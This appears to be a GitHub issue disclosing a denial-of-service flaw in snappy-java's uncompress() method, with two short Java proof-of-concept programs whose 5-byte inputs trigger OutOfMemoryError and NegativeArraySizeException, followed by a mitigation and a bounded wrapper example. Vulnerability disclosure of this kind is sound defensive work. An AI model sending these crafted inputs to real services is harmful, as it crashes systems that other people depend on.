Missing bound check on uncompress() in snappy-java can lead to Denial of Service (DoS) impact #625

Open
c2an1 opened this issue Dec 23, 2024 · 0 comments

c2an1 commented Dec 23, 2024

Description

The uncompress() method in snappy-java lacks proper validation of the uncompressedLength, which leads to a potential Denial of Service (DoS) vulnerability. Specifically, with only 5 bytes of input, the library becomes vulnerable to DoS attacks.

Details

In the Snappy.java, the uncompress() method is implemented as follows:

public static byte[] uncompress(byte[] input) throws IOException {
    byte[] result = new byte[Snappy.uncompressedLength(input)];
    Snappy.uncompress(input, 0, input.length, result, 0);
    return result;
}

When creating the new byte[] array, there is no upper bounds check on the uncompressedLength. As a result, if uncompressedLength is too large, it can lead to an OutOfMemoryError, similar to the vulnerability of snappy-java described in GHSA-55g7-9cwv-5qfv (GitHub advisory).

Proof of Concept (PoC) 1

import org.xerial.snappy.Snappy;

public class PoC1 {
    public static void main(String[] args) {
        byte[] data = new byte[] { (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0x07 };
        try {
            byte[] uncompressedData = Snappy.uncompress(data);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

This will produce the following exception:
java.lang.OutOfMemoryError

Similarly, as seen in GHSA-pqr6-cmr2-h8hf (GitHub advisory), the absence of lower bounds checks on uncompressedLength can lead to a NegativeArraySizeException due to integer overflow.

Proof of Concept (PoC) 2

import org.xerial.snappy.Snappy;

public class PoC2 {
    public static void main(String[] args) {
        byte[] data = new byte[] { (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0x08 };
        try {
            byte[] uncompressedData = Snappy.uncompress(data);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

This will produce the following exception:
java.lang.NegativeArraySizeException

Impact
Denial of Service (DoS).

Mitigation
To resolve this issue, we suggest adding bounds validation in the uncompress() method before allocating the array. Specifically, ensure that Snappy.uncompressedLength(input) is greater than 0 and below a reasonable upper limit, similar to the fix applied in GHSA-55g7-9cwv-5qfv.
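The following is an added example of the suggested mitigation, written for this page and not taken from snappy-java itself: a hypothetical wrapper that reads the declared length with Snappy.uncompressedLength(), rejects it when it is negative (the integer-overflow case) or above a caller-supplied ceiling, and only then allocates the output array. The 64 MiB ceiling and the two 5-byte headers fed to it are assumptions taken from the PoCs above.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import org.xerial.snappy.Snappy;

/** Hypothetical bounded wrapper around Snappy.uncompress (example code, not the library's). */
public final class BoundedSnappy {
    /** Assumed per-call ceiling on the decoded size; tune it to what the caller really needs. */
    public static final int DEFAULT_MAX_UNCOMPRESSED = 64 * 1024 * 1024;

    public static byte[] uncompress(byte[] input, int maxUncompressed) throws IOException {
        if (input == null || input.length == 0) {
            throw new IOException("empty snappy input");
        }
        // Decode only the varint length header; nothing is allocated for the output yet.
        int declared = Snappy.uncompressedLength(input);
        // Reject the overflowed (negative) and oversized cases before new byte[declared] runs.
        if (declared < 0 || declared > maxUncompressed) {
            throw new IOException("declared uncompressed length " + declared
                    + " outside [0, " + maxUncompressed + "]");
        }
        // Cheap structural check so a malformed stream fails before the allocation, not after.
        if (!Snappy.isValidCompressedBuffer(input)) {
            throw new IOException("invalid snappy stream");
        }
        byte[] out = new byte[declared];
        int written = Snappy.uncompress(input, 0, input.length, out, 0);
        if (written != declared) {
            throw new IOException("decoded " + written + " bytes, header declared " + declared);
        }
        return out;
    }

    public static void main(String[] args) throws IOException {
        // Constructed inputs: the two 5-byte headers from PoC 1 (oversized) and PoC 2 (overflow).
        byte[][] samples = {
            { (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0x07 },
            { (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0x08 },
        };
        for (byte[] s : samples) {
            try {
                uncompress(s, DEFAULT_MAX_UNCOMPRESSED);
            } catch (IOException e) {
                System.out.println("rejected before allocation: " + e.getMessage());
            }
        }
        // A legitimate round trip still succeeds under the same ceiling.
        byte[] plain = "hello snappy".getBytes(StandardCharsets.UTF_8);
        byte[] back = uncompress(Snappy.compress(plain), DEFAULT_MAX_UNCOMPRESSED);
        if (!Arrays.equals(plain, back)) throw new IllegalStateException("round trip failed");
    }
}
```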
